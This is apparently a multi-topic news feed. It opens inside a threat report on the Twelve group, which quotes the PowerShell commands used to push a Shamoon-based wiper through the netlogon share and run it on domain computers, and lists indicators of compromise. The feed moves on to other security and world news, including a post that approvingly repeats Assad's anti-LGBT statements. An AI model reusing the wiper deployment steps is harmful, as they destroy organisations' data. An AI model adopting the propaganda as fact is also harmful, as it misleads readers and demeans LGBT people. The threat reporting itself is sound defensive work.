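    print("wiped:  ", triage_mbr(wiped_mbr()))
```

A missing signature with an empty partition table is what a wiper leaves behind; a missing signature with an intact table more often means a GPT disk whose protective MBR was never written by this tool, so the findings are leads for the analyst rather than a verdict.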

Wiper detonation graph in Kaspersky Cloud SandBox

Result of the wiper static analysis

Also while researching the attacks by Twelve, we discovered another version of the wiper. The sample was identical to Shamoon, except for a number of specifically renamed functions.

Renamed Shamoon-based wiper features

While investigating attacks by the group, we found wiper files at the following paths:

  • \Desktop\;
  • \ProgramData\;
  • \\netlogon\.

The following file names have featured in known incidents involving the wiper:

  • intel.exe;
  • mail.exe;
  • wiper.exe.

The wiper’s spread pattern across a victim’s infrastructure is almost no different from that of the ransomware. The adversary uses PowerShell to copy the wiper file to the netlogon network share and then runs a script that modifies group policies and creates scheduled tasks.
powershell -ex bypass -f \\[DOMAIN]\netlogon\outlookconf2003.ps1
The wiper file is then copied from the netlogon network share to the local ProgramData folder on all previously encrypted domain computers.
powershell.exe Copy-Item \\[DOMAIN]\netlogon\intel.exe -Destination C:\ProgramData
After this, a scheduled task starts and runs the wiper file, which destroys data on the device.
C:\ProgramData\intel.exe

Wiper spread pattern in the victim's infrastructure

Objectives


The threat actor’s strategic goals:

  • Destroy critical infrastructure and disrupt business;
  • Steal sensitive data;
  • Discredit victims by reporting the compromise on the attackers’ Telegram channel.


Takeaways


Twelve is driven mainly by hacktivism rather than financial gain. This shows in its modus operandi: rather than demanding a ransom to decrypt data, Twelve encrypts victims' data and then destroys their infrastructure with a wiper to prevent recovery. The approach indicates a desire to cause maximum damage to target organisations without deriving any direct financial benefit.

Our analysis also shows that the group sticks to a publicly available and well-known arsenal of malware tools, which suggests it develops none of its own. That makes it possible to detect and block Twelve's attacks in time; failing to do so can leave the organisation's infrastructure seriously damaged.

Indicators of compromise


Web-Shells
05d80c987737e509ba8e6c086df95f7d
48b2e5c49f121d257b35ba599a6cd350
5dcd02bda663342b5ddea2187190c425
97aac7a2f0d2f4bdfcb0e8827a111524
dad076c784d9fcbc506c1e614aa27f1c
ecb14e506727ee67220e87ced2e6781a
f8da1f02aa64e844770e447709cdf679

Mimikatz
e930b05efe23891d19bc354a4209be3e

Scripts
7a7c0a521b7596318c7cd86582937d98
72830102884c5ebccf2afbd8d9a9ed5d
31014add3cb96eee557964784bcf8fde
7dfa50490afe4553fa6889bdafda7da2

Ngrok
43b3520d69dea9b0a27cce43c1608cad

Cobalt Strike
7bec3c59d412f6f394a290f95975e21f

Ransomware
9c74401a28bd71a87cdf5c17ad1dffa5 twelve.exe
d813f5d37ab2feed9d6a2b7d4d5b0461 12.exe
646a228c774409c285c256a8faa49bde enc.exe
5c46f361090620bfdcac6afce1150fae twelve.exe
9bd78bcf75b9011f9d7a9a6e5aee5bf6 twelve.exe
f90e95b9fcab4c1b08ca06bc2c2d6e40 12.exe
39b91f5dfbbec13a3ec7cce670cf69ad sed.exe/1.exe/Screen2.exe/SVO.exe/BETTA.EXE

Wiper
4bff90a6f7bafc8e719e8cab87ab1766 intel.exe/mail.exe

File paths
C:\ProgramData\sed.exe
C:\Users\{username}\Downloads\sed.exe
C:\Users\{username}\Desktop\sed.exe
C:\programdata\svchost\svchost.exe
C:\programdata\svchost\svchost.yml
C:\Users\{username}\AppData\Local\CEF\User Data\Dictionaries\svchost.exe
C:\Users\{username}\AppData\Local\CEF\User Data\Dictionaries\svchost.yml
C:\Users\{username}\Desktop\svchost.exe
C:\Users\{username}\Desktop\svchost.yml
C:\users\{username}\pictures\photos_delo\loop.exe
C:\users\{username}\downloads\chisel_1.9.1_windows_amd64\chisel.exe
C:\Users\{username}\Documents\PowerView.ps1
C:\Users\{username}\Documents\calculator.exe
C:\Windows\qbkLIdag.exe
C:\Windows\System32\Tasks\run
C:\Windows\System32\Tasks\Update Microsoft
C:\Windows\System32\Tasks\Yandex
C:\Windows\System32\Tasks\YandexUpdate
C:\Windows\SYSVOL\domain\scripts\intel.exe
C:\Windows\SYSVOL\domain\scripts\outlookconf2003.ps1
C:\Windows\SYSVOL\domain\scripts\ZZZZZZ
C:\Windows\SYSVOL_DFSR\domain\scripts\intel.exe
\\[DOMAIN]\netlogon\12.exe
\\[DOMAIN]\netlogon\outlookconf2003.ps1
\\[DOMAIN]\netlogon\intel.exe
C:\123\12.exe
C:\ProgramData\intel.exe
C:\Users\Public\46a2209036e6282c45f8dfd3f046033d.ps1
C:\Users\Public\gpo.ps1
C:\Windows\Logs\PsExec.exe

Domains and IPs
212.109[.]217.88
195.2[.]79.195
109.205[.]56.229
193.110[.]79.47
217.148[.]143.196
5.8[.]16.147
5.8[.]16.148
5.8[.]16.149
5.8[.]16.169
5.8[.]16.170
5.8[.]16.236
5.8[.]16.238
79.137[.]69.34
85.204[.]124.94
89.238[.]132.68
89.33[.]8.198
91.90[.]121.220


securelist.com/twelve-group-un…



Sweden increases military spending by 10%


@Notizie dall'Italia e dal mondo
In Sweden the government has decided to increase the defence budget to support the strengthening of NATO's northern flank
The article "Sweden increases military spending by 10%" comes from Pagine Esteri.

pagineesteri.it/2024/09/20/mon…



COBB Tuning Hit With $2.9 Million Fine Over Emissions Defeat Devices



Recently, the EPA and COBB Tuning have settled after the latter was sued for providing emissions control defeating equipment. As per the EPA’s settlement details document, COBB Tuning have since 2015 provided customers with the means to disable certain emission controls in cars, in addition to selling aftermarket exhaust pipes with insufficient catalytic systems. As part of the settlement, COBB Tuning will have to destroy any remaining device, delete any such features from its custom tuning software and otherwise take measures to fully comply with the Clean Air Act, in addition to paying a $2,914,000 civil fine.

The tuning of cars has come a long way from the 1960s when tweaking the carburetor air-fuel ratios was the way to get more power. These days cars not only have multiple layers of computers and sensor systems that constantly monitor and tweak the car’s systems, they also have a myriad of emission controls, ranging from permissible air-fuel ratios to catalytic converters. It’s little surprise that these systems can significantly impact the raw performance one might extract from a car’s engine, but if the exhaust of nitrogen-oxides and other pollutants is to be kept within legal limits, simply deleting these limits is not a permissible option.

COBB Tuning stated that they were not aware of these issues and that they never marketed these features as 'emission controls defeating'. They were, however, aware of problems with their products, which is why in 2022 they announced 'Project Green Speed', which was supposed to bring COBB into compliance. The EPA evidently still found fault, and COBB was forced to make adjustments.

Although perhaps not as egregious as modifying diesel trucks to ‘roll coal’, federal law has made it abundantly clear that if you really want to have fun tweaking and tuning your car without pesky environmental laws getting in the way, you could consider switching to electric drivetrains, even if they’re mind-numbingly easy to make performant compared to internal combustion engines.


hackaday.com/2024/09/20/cobb-t…



New Data Breach at Dell: confidential information on over 10,000 users revealed


Recently Dell Technologies, one of the largest American technology companies, was caught up in an alleged data breach. A hacker known by the alias "grep" claimed to have breached Dell's systems, exposing the data of more than 10,800 employees and internal partners. The information was published on a dark web forum, raising significant concerns about the company's cybersecurity.

According to reports, the leaked data include sensitive employee details such as IDs, full names, employment status and internal identifiers. The forum post, accompanied by a sample of the stolen data, indicated that the breach took place in early September 2024.

At present we cannot confirm the accuracy of the report, as the organisation has not yet published an official statement about the incident on its website. This article should therefore be treated as an "intelligence source".
Post found on the dark web

Despite the absence of cleartext passwords or other personally identifiable information, the leak still poses a significant threat to Dell. Attackers could use this information for phishing attacks or phone scams that exploit the employees' vulnerability. Moreover, this incident follows another data breach in May 2024, in which the data of 49 million customers were compromised.

Conclusions


This is not Dell's first incident of this kind; the company has faced similar problems in the past. Once again, the breach underlines the importance of implementing robust security measures and carrying out regular audits to protect sensitive data.

As is our custom, we leave room for a statement from the company should it wish to give us updates on the matter. We will be happy to publish such information in a dedicated article giving the issue due prominence.

RHC will monitor developments and publish further news on the blog should there be substantial updates. Anyone with knowledge of the facts who wishes to provide information anonymously can use the whistleblower's encrypted email.

The article "New Data Breach at Dell: confidential information on over 10,000 users revealed" comes from il blog della sicurezza informatica.



Paper and banknotes to be repaired: Gaza's micro-economy


@Notizie dall'Italia e dal mondo
In people's pockets, what little money there is has been destroyed; in improvised hospitals and schools there are no sheets to write on. Necessity is made a virtue. But it is not enough: the economic crisis in the UN's new figures
pagineesteri.it/2024/09/20/med…



Council working document shows member states not on board with Letta, Draghi reports


Responses from EU member states to the Hungarian Presidency's first draft conclusions on the telecoms sector show that countries remain largely unconvinced by Letta and Draghi's arguments for deregulating the sector.


euractiv.com/section/digital/n…



It is not true that carbon credits enrich poor countries


@Notizie dall'Italia e dal mondo
The new article by @valori@poliversity.it
A report says that projects issuing carbon credits do not contribute to the economic growth of the countries where they are located
The article "It is not true that carbon credits enrich poor countries" comes from Valori.

valori.it/carbon-credits-paesi…




The report with the first data on state schools in the 2024/2025 school year is online.

In the year just begun, 7,073,587 students returned to the classroom, distributed across 362,115 classes.

All the details here ▶️ miur.



Friendica: how to add alternative text for images from the web interface

@Che succede nel Fediverso?

When you post images on social networks, it is important to add alternative text. It helps people with visual impairments understand the content of images through a screen reader, and it shows a commitment to inclusivity by making your content accessible to a wider audience.
It can also provide extra context for users who have trouble loading images because of a slow internet connection.

Friendica lets you add alternative text, but doing so from the browser can be a little tricky.

When you add an image in Friendica, what you see is the image's embed code, which looks more or less like this:

[url=https://poliverso.org/photo/IDENTIFICATIVO_IMMAGINE-0.jpeg][img=https://poliverso.org/photo/IDENTIFICATIVO_IMMAGINE-1.jpeg][/img][/url]

In detail:

[url=https://poliverso.org/photo/IDENTIFICATIVO_IMMAGINE-0.jpeg][img=https://poliverso.org/photo/IDENTIFICATIVO_IMMAGINE-1.jpeg]
      [/img][/url]

The alternative text goes right between the opening tag [img=xxx] and the closing tag [/img]. So:

[url=https://poliverso.org/photo/IDENTIFICATIVO_IMMAGINE-0.jpeg][img=https://poliverso.org/photo/IDENTIFICATIVO_IMMAGINE-1.jpeg]
            Alternative text
      [/img][/url]

Or, more realistically:

[url=https://poliverso.org/photo/IDENTIFICATIVO_IMMAGINE-0.jpeg][img=https://poliverso.org/photo/IDENTIFICATIVO_IMMAGINE-1.jpeg]Alternative text[/img][/url]


Here is a real example:

[url=https://poliverso.org/photo/1997546105611028f975883153721557-0.jpeg][img=https://poliverso.org/photo/1997546105611028f975883153721557-1.jpeg]The dung beetle drags a ball of dung: in Egyptian symbolism it represented the administrator of a public Fediverse instance[/img][/url]

Which becomes:

Easy, right? OK... it is not easy at all. But by now we know: Friendica is really powerful software, but, despite its name, it is not friendly at all! 🤣

#FriendicaIsNotFriendly
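For anyone who would rather script this than edit the tag by hand, the following Python is an added example, not Friendica's own code: it inserts alt text into the [img=...][/img] pair shown above and renders the embed to HTML with the alt text and URLs escaped, so that a user-supplied description can never break out of the attribute and only http(s) URLs reach src and href. The sample URLs are placeholders, and Friendica's real renderer handles many more tags than these two.

```python
import html
import re

# Friendica's image embed as shown above: [url=FULL][img=PREVIEW]alt text[/img][/url]
IMG_TAG = re.compile(r"\[img=([^\]]+)\](.*?)\[/img\]", re.S)
URL_TAG = re.compile(r"\[url=([^\]]+)\](.*?)\[/url\]", re.S)


def add_alt_text(bbcode, alt):
    """Insert alt text into every [img=...][/img] pair that does not already have one.

    Square brackets are removed from the alt text because Friendica would parse them as
    BBCode and the embed would break.
    """
    clean = alt.replace("[", "").replace("]", "").strip()

    def repl(m):
        url, existing = m.group(1), m.group(2).strip()
        return f"[img={url}]{existing or clean}[/img]"

    return IMG_TAG.sub(repl, bbcode)


def _safe_url(url):
    """Only http(s) URLs may reach src/href; anything else (javascript:, data:) is dropped."""
    return url if url.lower().startswith(("http://", "https://")) else None


def render(bbcode):
    """Render the embed to HTML with alt text and URLs escaped, so user-supplied alt text
    cannot escape the attribute it is placed in."""
    def img(m):
        src, alt = _safe_url(m.group(1)), m.group(2).strip()
        if src is None:
            return html.escape(alt)
        return f'<img src="{html.escape(src, quote=True)}" alt="{html.escape(alt, quote=True)}">'

    def link(m):
        href, inner = _safe_url(m.group(1)), m.group(2)
        if href is None:
            return inner
        return f'<a href="{html.escape(href, quote=True)}">{inner}</a>'

    return URL_TAG.sub(link, IMG_TAG.sub(img, bbcode))


if __name__ == "__main__":
    sample = ("[url=https://poliverso.org/photo/ID-0.jpeg]"
              "[img=https://poliverso.org/photo/ID-1.jpeg][/img][/url]")
    tagged = add_alt_text(sample, "A dung beetle dragging a ball of dung")
    print(tagged)
    print(render(tagged))
```

The two places where alt text needs care are visible in the code: square brackets must be stripped when writing BBCode, and HTML escaping must happen when rendering; doing one without the other leaves either a broken embed or an injection point.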



The past and future of the Atlantic Alliance according to Stoltenberg

@Notizie dall'Italia e dal mondo

[quote]Ukraine, Afghanistan, the state of transatlantic relations and the future of collective security. In one of his last public appearances as NATO Secretary General, Jens Stoltenberg took part in an event hosted by the German Marshall Fund to discuss the deep



From China with Ethics! A 9.8 RCE in VMware vCenter Server. Update!


Broadcom has released updates to fix a critical vulnerability in VMware vCenter Server that could lead to remote code execution. The vulnerability, CVE-2024-38812, rated CVSS 9.8, is a heap-based buffer overflow in the DCE/RPC protocol implementation.

According to the vendor, an attacker with network access can trigger the vulnerability with specially crafted network packets and execute code remotely on the vCenter server.

The flaw is similar to two other remote code execution vulnerabilities, CVE-2024-37079 and CVE-2024-37080, patched in June 2024. Those also carry a CVSS score of 9.8.

In addition, the privilege escalation vulnerability CVE-2024-38813, scored 7.5, has been fixed; it allows attackers with network access to escalate privileges to root, again by sending specially crafted network packets.

Both vulnerabilities were discovered by security researchers from team TZL during the Matrix Cup cybersecurity competition held in China in June 2024.

Fixes are available for the following versions:

  • vCenter Server 8.0 (fixed in 8.0 U3b);
  • vCenter Server 7.0 (fixed in 7.0 U3s);
  • VMware Cloud Foundation 5.x (fix available through 8.0 U3b);
  • VMware Cloud Foundation 4.x (fixed in 7.0 U3s).

Broadcom stressed that there is currently no evidence of attackers exploiting these vulnerabilities, but users are strongly encouraged to update their systems to prevent potential attacks.

The vulnerabilities stem from memory management errors that open the way to remote code execution when the VMware vCenter services are exploited.

These events coincided with the publication of a joint advisory by the US Cybersecurity and Infrastructure Security Agency (CISA) and the FBI stressing the need to address cross-site scripting (XSS) vulnerabilities, which attackers can use to compromise systems.

The article "From China with Ethics! A 9.8 RCE in VMware vCenter Server. Update!" comes from il blog della sicurezza informatica.



Hyperloop: from sci-fi to priority for next EU transport commissioner


European Commission President Ursula von der Leyen has tasked her incoming transport commissioner with developing the hyperloop, but a recent test of the technology shows there is much to be done before it becomes the next high-speed transport mode.


euractiv.com/section/railways/…



Laser Fault Injection, Now With Optional Decapping



Whether the goal is reverse engineering, black hat exploitation, or just simple curiosity, getting inside the packages that protect integrated circuits has long been the Holy Grail of hacking. It isn’t easy, though; those inscrutable black epoxy blobs don’t give up their secrets easily, with most decapping methods being some combination of toxic and dangerous. Isn’t there something better than acid baths and spinning bits of tungsten carbide?

[Janne] over at Fraktal thinks so, and the answer he came up with is laser decapping. Specifically, this is an extension of the laser fault injection setup we recently covered, which uses a galvanometer-scanned IR laser to induce glitches in decapped microcontrollers to get past whatever security may be baked into the silicon. The current article continues that work and begins with a long and thorough review of various IC packaging technologies, including the important anatomical differences. There’s also a great review of the pros and cons of many decapping methods, covering everything from the chemical decomposition of epoxy resins to thermal methods. That’s followed by specific instructions on using the LFI rig to gradually ablate the epoxy and expose the die, which is then ready to reveal its secrets.

The benefit of leveraging the LFI rig for decapping is obvious — it’s an all-in-one tool for gaining access and executing fault injection. The usual caveats apply, of course, especially concerning safety; you’ll obviously want to avoid breathing the vaporized epoxy and remember that lasers and retinas don’t mix. But with due diligence, having a single low-cost tool to explore the innards of chips seems like a big win to us.


hackaday.com/2024/09/20/laser-…



Quishing: Out of Money and with a Hefty Fine! The new scheme spreading across Europe


Criminal groups in Europe are actively using QR code fraud (quishing) to defraud tourists. Netcraft researchers report that two major criminal gangs are running QR code schemes for parking payments, spreading them across the United Kingdom and other countries.

The scammers stick fake QR codes on parking meters, redirecting people to fake websites that ask for personal and bank card details. This not only leads to theft of funds but also exposes the victim to fines for unpaid parking.

The first sign of the new threat came in August, when the British insurance company RAC warned drivers to be careful and to pay for parking only through official apps or in cash. The company estimates that in the two months since the alert was issued, more than 10,000 people have fallen victim to these schemes.

This type of fraud is gradually spreading beyond Europe's borders: the United States and Canada are starting to face the problem too. The FBI has already issued a warning about the threat posed by cybercriminals using QR codes to steal funds from users.

In the UK, the scammers started with QR code stickers in central London before the scheme spread to cities such as Blackpool, Brighton, Portsmouth and Aberdeen. The fraudsters pay particular attention to tourists who are unfamiliar with local parking systems.

One of the criminal syndicates masquerades as the PayByPhone app. Users scan the fake codes, enter their car and bank card details, and the site confirms that the payment went through. In reality, the money goes to the scammers.

According to the researchers, all the fraudulent sites share similar characteristics: they are registered through the domain registrar NameSilo and use ".info", ".click", ".live" and other domains. The fake sites also sit behind Cloudflare to mask the fraudulent activity.

Robert Duncan of Netcraft notes that it is difficult for compan!
ies to protect themselves from such attacks because mobile devices are less secure than computers. However, using specialised brand protection platforms can help identify threats at an early stage.

The article "Quishing: Out of Money and with a Hefty Fine! The new scheme spreading across Europe" comes from il blog della sicurezza informatica.
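A security team asked to vet the URL behind a parking-meter QR code can apply the signals the report describes (brand names on non-official domains, the .info/.click/.live TLDs, no HTTPS) before anyone types in card details. The following Python is an added example, not code from Netcraft or the original article: it takes the URL decoded from the code and returns the reasons it looks suspect. The official PayByPhone domains listed, the TLD watchlist and the tiny public-suffix table are assumptions for illustration; a real deployment would take them from maintained lists.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumptions for illustration: the brand's legitimate registrable domains, the TLDs the
# report associates with the fake parking sites, and a stand-in for the Public Suffix List.
BRAND_DOMAINS = {"paybyphone": {"paybyphone.com", "paybyphone.co.uk"}}
WATCHLIST_TLDS = {"info", "click", "live"}
MULTI_LABEL_SUFFIXES = {"co.uk", "org.uk", "gov.uk", "ac.uk"}


def registrable_domain(host):
    """Reduce a hostname to its registrable domain (example.co.uk, example.info)."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def triage_qr_url(url):
    """Return the reasons a URL decoded from a parking-meter QR code should be treated as suspect.

    An empty list means none of the heuristics fired; it does not prove the URL is legitimate.
    """
    reasons = []
    parts = urlsplit(url.strip())
    host = parts.hostname or ""
    if parts.scheme != "https":
        reasons.append(f"scheme is '{parts.scheme or 'missing'}', not https")
    if not host:
        reasons.append("no hostname")
        return reasons
    try:
        ipaddress.ip_address(host)
        reasons.append("host is a bare IP address")
        return reasons
    except ValueError:
        pass
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("punycode label in hostname")
    domain = registrable_domain(host)
    tld = domain.rsplit(".", 1)[-1]
    if tld in WATCHLIST_TLDS:
        reasons.append(f".{tld} TLD is on the watchlist")
    for brand, official in BRAND_DOMAINS.items():
        # Hyphens are removed so pay-by-phone.example still counts as carrying the brand.
        if brand in host.replace("-", "") and domain not in official:
            reasons.append(f"'{brand}' appears in the hostname but {domain} is not an official {brand} domain")
    return reasons


if __name__ == "__main__":
    for u in ("https://paybyphone.co.uk/pay", "https://paybyphone-parking.info/pay",
              "http://203.0.113.9/paybyphone", "https://secure.paybyphone.com.click/"):
        print(u, "->", triage_qr_url(u) or "no findings")
```

The registrable-domain step matters most: secure.paybyphone.com.click carries the brand in a subdomain, and only reducing it to com.click exposes that the registered domain is nothing to do with the operator.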



Bashar al-Assad speaks in detail about neoliberalism and its manifestations:

Neoliberalism is based on promoting total moral degradation, on separating individuals from any principle, value, affiliation [to a nation and religion] and belief.

Neoliberalism promoted same-sex marriage; it began in the 1970s and is now legal [in the West]. Now they are already having children. Another question is: how do they have children?

Neoliberalism promotes the idea that a child should not have a religion of his own, but this is contrary to the child's freedom of expression, this is contrary to human nature! Once upon a time, people created idols and gods for themselves. And it is entirely natural and normal for a child to instinctively profess the religion of his parents.

Now [neoliberalism] promotes the same thing, namely that marijuana and drugs are generally harmless, and today you can even buy them legally in shops just like bread! Soon they will invent something else harmful to legalise... This is liberalism!

Today neoliberalism declares that a child is born without a gender and that over time they must choose their own gender. This is really very strange. What are we supposed to make of all this?

Neoliberalism destroys humanity by doing everything that harms people's values and religions, because values and religions serve humanity, so neoliberalism tries to separate them from people!
Clear and incisive 👏
💢💢💢
https://t.me/radio28tv



Generative AI is the future, in cybersecurity too


By Antonio Madoglio, SE Director Italy at Fortinet

In recent years Artificial Intelligence has made the headlines, arousing the curiosity of users and companies alike. It is an interdisciplinary field of computer science concerned with building systems able to perform tasks that, if carried out by humans, would require intelligence. The ultimate goal of AI is to develop technologies that improve human-machine interaction, make decision-making processes more efficient and solve problems that demand a high level of intelligence.

Artificial Intelligence has wide applications in cybersecurity: it can be useful, for example, for advanced threat detection, reducing false positives, as well as for predicting cyber attacks before they happen. And that is not all: AI can also be used to simplify SOC operations.

Generative Artificial Intelligence (GenAI for short), which has been much talked about lately, is a type of AI able to create content of various kinds, such as images or text, that is generated (hence the name) in response to specific requests from users, the so-called prompts.
Antonio Madoglio, SE Director Italy at Fortinet
Generative AI is redefining network and security operations, supporting IT and cyber professionals in completing more tasks in less time. Fortinet is committed to staying at the forefront of innovation in this area and with this goal recently introduced a new GenAI assistant, FortiAI (formerly Fortinet Advisor), integrating it into its FortiAnalyzer, FortiSIEM and FortiSOAR solutions. This addition will help every security operations team make better-informed decisions and respond to threats faster, simplifying even the most complex tasks.

FortiAI's generative AI functions support OpenAI and Google Bard (FortiSOAR only) and can be connected to other large language models. FortiAI augments the intelligence of the «public AI engines» with Fortinet intelligence, Fortinet's products and knowledge of Fortinet-specific use cases, transforming GenAI prompts and responses to give users an in-product experience that is simple yet context-aware and able to deliver immediately actionable results. Fortinet's AI specialists continuously update FortiAI's intelligence database and the mechanisms it uses, so as to optimise users' interactions with the Artificial Intelligence and the corresponding results.

Data sharing in the cloud is limited to explicit customer interactions, and sensitive information can be masked before sharing. FortiAI neither shares nor provides access to user data, nor does it allow the GenAI engine to use their data for training; last but not least, access to FortiAI is subject to the product's standard controls.

Let us now run through the various products and their respective implementations, which give a good idea of the innovations introduced.

FortiAnalyzer offers unprecedented visibility into IT and OT infrastructures. Integrating seamlessly with devices and applications across the Fortinet Security Fabric, it turns raw data into actionable intelligence, offering a consolidated view that helps eliminate operational bottlenecks, strengthens defences with historical and real-time insight and lets security teams stay proactive at all times. The new release of FortiAI for FortiAnalyzer simplifies and optimises network and security operations, threat analysis, response actions and more. FortiAI's key functions include detection, investigation, response and ad hoc commands.

FortiSOAR centralises, standardises and automates IT/OT security and network operations. Thanks to its extensive integrations across Fortinet and multivendor environments, rich use-case solutions, hundreds of prebuilt playbooks and comprehensive SecOps management capabilities, FortiSOAR forms the automation foundation of the Security Operations Center (SOC) for leading enterprises and MSSPs worldwide. The investigation, response and playbook-creation functions of FortiAI for FortiSOAR have been enhanced with new features, including alert insights, GenAI reminders, privacy improvements and forensic logging.

FortiSIEM handles centralised collection of IT/OT events, advanced detection analytics, incident management and the other SOC functions that security teams may need. Built on user and entity behavior analytics (UEBA), a proprietary configuration management database (CMDB) and GenAI assistance, the intuitive analyst experience supports every aspect of threat monitoring, incident response and compliance validation across the Fortinet Security Fabric and multivendor infrastructures. The investigation, response and product-command functions of FortiAI for FortiSIEM have also been enhanced. The new features include threat hunting, asset/user profiles and case summaries.

And the future?

Fortinet is committed to continuously developing and expanding FortiAI and the other Artificial Intelligence solutions in its product portfolio. This includes offering similar GenAI capabilities for WAN and LAN infrastructures, with the aim of supporting network operations teams and letting even less experienced users achieve the results they want.

The article Generative AI is the future, in cybersecurity too comes from il blog della sicurezza informatica.



The Future of Call Centers in the Philippines: What Will Employees Do Once Chatbots Overtake Them?


While the world is still debating the impact of artificial intelligence (AI) on employment, call center workers in the Philippines are already living through the consequences of this transformation. The country, known as the “call center capital of the world”, now faces a new threat: the replacement of human workers by robots and advanced algorithms.

Large multinationals, driven by the need to cut costs and increase efficiency, are progressively deploying AI technologies in their outsourcing services, putting up to 300,000 jobs in the Philippine BPO (Business Process Outsourcing) sector at risk over the next five years. This technological revolution could, however, also create new opportunities, with 100,000 new jobs forecast in areas such as algorithm training and data management.

A telling example of this transition is Christopher Bautista, a veteran of the call center industry, who has seen his job gradually replaced by cheaper and more efficient AI solutions. Despite this, the overall number of employees in the sector continues to grow, at least for now. The challenge, as experts point out, is to prepare workers properly for this new era, ensuring they can adapt and thrive in a workplace increasingly dominated by technology.

Artificial intelligence is already showing its potential in the Philippines, with companies such as [24]7.ai using advanced chatbots to train new employees and cut training time from three months to a few weeks. At the same time, multinationals such as Concentrix are experimenting with AI assistants that monitor and analyse conversations in real time, highlighting automation's growing role in business processes.

The Philippine government has responded to these challenges with initiatives to upskill the sector's 1.7 million workers, but there is still a long way to go. The need to update skills quickly is clear, with prominent figures such as Arsenio Balisacan, head of the National Economic and Development Authority, warning: “If you don't upgrade your skills, AI will replace you.”

Despite the concerns, the future is not entirely bleak. The Philippines could become an example of how a country can adapt and prosper during a technological revolution, if it manages to seize the opportunities offered by artificial intelligence.

Conclusion

Artificial intelligence is rapidly changing the face of the call center industry in the Philippines, with significant implications for the future of employment. The country stands at a crossroads where risks and opportunities coexist. Preparing properly and adapting to the new reality will be essential to ensure that Filipino workers can continue to thrive in an increasingly technologically advanced world.

The article The Future of Call Centers in the Philippines: What Will Employees Do Once Chatbots Overtake Them? comes from il blog della sicurezza informatica.



Inside a Portable Satellite Dish



Like many of us, [Gabe] has things he just can’t stop buying. In his case, it is portable satellite dishes. You’ve seen these. They look like a dome or maybe a hard hat on some kind of motorized base. What’s in them? What can you do with them? Watch the video below and find out.

As [Gabe] points out, you can often find these on the surplus market for very little money. You can sometimes find them on the side of the road for free, too. Although we’ve never been that lucky.

The video shows three generations of Winegard antennas. It shows what’s inside and how to command them. Of course, the obvious use for these is as an antenna. But we also were thinking they’d make a fair motion base for something, too.

Some of the antennas lack any limit switches. On startup, the system spins until it grinds the plastic gears to find its travel limits. We expect that’s not good for the gears, but it does work. [Gabe] mentions it might be a bit of planned obsolescence, but we imagine it is more of a cost-saving measure.

Junkyards are a frequent source for satellite gear, apparently. Dishes have lots of other uses, too.

youtube.com/embed/6kQa6nfUkIs?…


hackaday.com/2024/09/19/inside…



Pixels against Cancer! How AI Improves Treatment Response in Lung Cancer


Researchers at the University of Cologne have developed an innovative platform that uses artificial intelligence (AI) to analyse lung tissue and diagnose cancer. The project was led by Dr Yuri Tolkach and Professor Reinhard Büttner of the Faculty of Medicine and the University Hospital of Cologne.

The platform uses algorithms to automatically analyse tissue sections from lung cancer patients. Lung cancer is one of the most common and deadliest types of cancer. Non-small cell lung cancer (NSCLC) accounts for over 80% of all lung tumours and is considered the second most common and deadly type of epithelial cancer.
Treatment success depends largely on an accurate pathological examination, in which pathologists analyse biopsies and resection specimens. Introducing artificial intelligence can significantly optimise this process. Dr Tolkach notes: “The new tools can not only improve the quality of the diagnosis, but also provide new kinds of information about a patient's disease, such as their response to treatment.”

The scientists trained the artificial intelligence on the largest high-quality dataset available, allowing the technology to analyse biopsy samples rapidly, accurately segmenting 11 types of tumour and benign tissue at the pixel level.

The study, published in the journal Cell Reports Medicine, demonstrates two key applications for the tool:

  1. Building an accurate model to identify NSCLC types, tested and validated on patient data from several hospitals.
  2. Identifying four measurable markers in tissue samples that help predict cancer progression and patient survival.

In addition, the researchers released three datasets to support global lung cancer research and algorithm development. The team plans to continue validation studies in collaboration with five pathology institutes in Germany, Austria and Japan.

The article Pixels against Cancer! How AI Improves Treatment Response in Lung Cancer comes from il blog della sicurezza informatica.



2024 SAO Contest: The Jolly Tagger Is a Golden Way to Share Info


A golden Jolly Wrencher SAO that works as an NFC tag for sharing contact info.

For this contest, we’re asking you to come up with the best SAO you can think of that does something cool. What could be cooler than sharing your contact information all over Supercon and beyond with a tap of a Jolly Wrencher? It’s way better than just some sticker, and with the extra solder pad on the back, you can turn it into a pin once the con is over. Contact data can be uploaded over I²C.
The KiCad-generated coil (an antenna coil PCB trace as generated by a KiCad plugin).
Here, [Phil Weasel] seeks to answer the question of whether one can make a working NFC tag with the M24LR04E IC, using a PCB trace as a coil. If there is an issue, it’s probably going to be that copper plane inside the antenna.

Designing the antenna itself proved fairly easy after checking the datasheet for the internal tuning capacitance (~27.5 pF), verifying the frequency of NFC (~13.56 MHz), and doing the math to find the inductance needed. After confirming everything in LTSpice, [Phil] used a PCB coil calculator and let the KiCad coil generator draw it out.
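As an added worked example (not [Phil Weasel]'s code and not KiCad's coil generator), the resonance calculation from the article's numbers in Python, followed by a turn-count estimate for a square PCB spiral using the modified Wheeler approximation; the coil outline, trace width and spacing are constructed assumptions.

```python
"""Worked antenna numbers for a PCB-coil NFC tag.

Added example, not [Phil Weasel]'s code or KiCad's coil generator. The
tuning capacitance (~27.5 pF, from the M24LR04E datasheet as cited in the
article) and the 13.56 MHz NFC carrier come from the article; the coil
geometry and the spiral-inductor estimate (the modified Wheeler formula
for a square planar spiral, Mohan et al. 1999) are assumptions.
"""
import math

MU0 = 4 * math.pi * 1e-7  # vacuum permeability, H/m
NFC_HZ = 13.56e6
TUNING_CAP_F = 27.5e-12


def resonant_inductance(c_farads: float, f_hz: float = NFC_HZ) -> float:
    """Inductance that resonates with C at f: L = 1 / ((2*pi*f)**2 * C)."""
    w = 2 * math.pi * f_hz
    return 1.0 / (w * w * c_farads)


def square_spiral_inductance(n_turns: int, d_out_m: float,
                             trace_w_m: float, spacing_m: float) -> float:
    """Estimate the inductance of a square planar spiral (modified Wheeler).

    Assumes no copper plane inside the coil; the article flags exactly such a
    plane as the likely problem with the real board, so treat the result as an
    estimate to confirm in simulation or by measurement.
    """
    d_in = d_out_m - 2 * (n_turns * trace_w_m + (n_turns - 1) * spacing_m)
    if d_in <= 0:
        raise ValueError("turns do not fit inside the outer dimension")
    d_avg = 0.5 * (d_out_m + d_in)
    rho = (d_out_m - d_in) / (d_out_m + d_in)   # fill ratio
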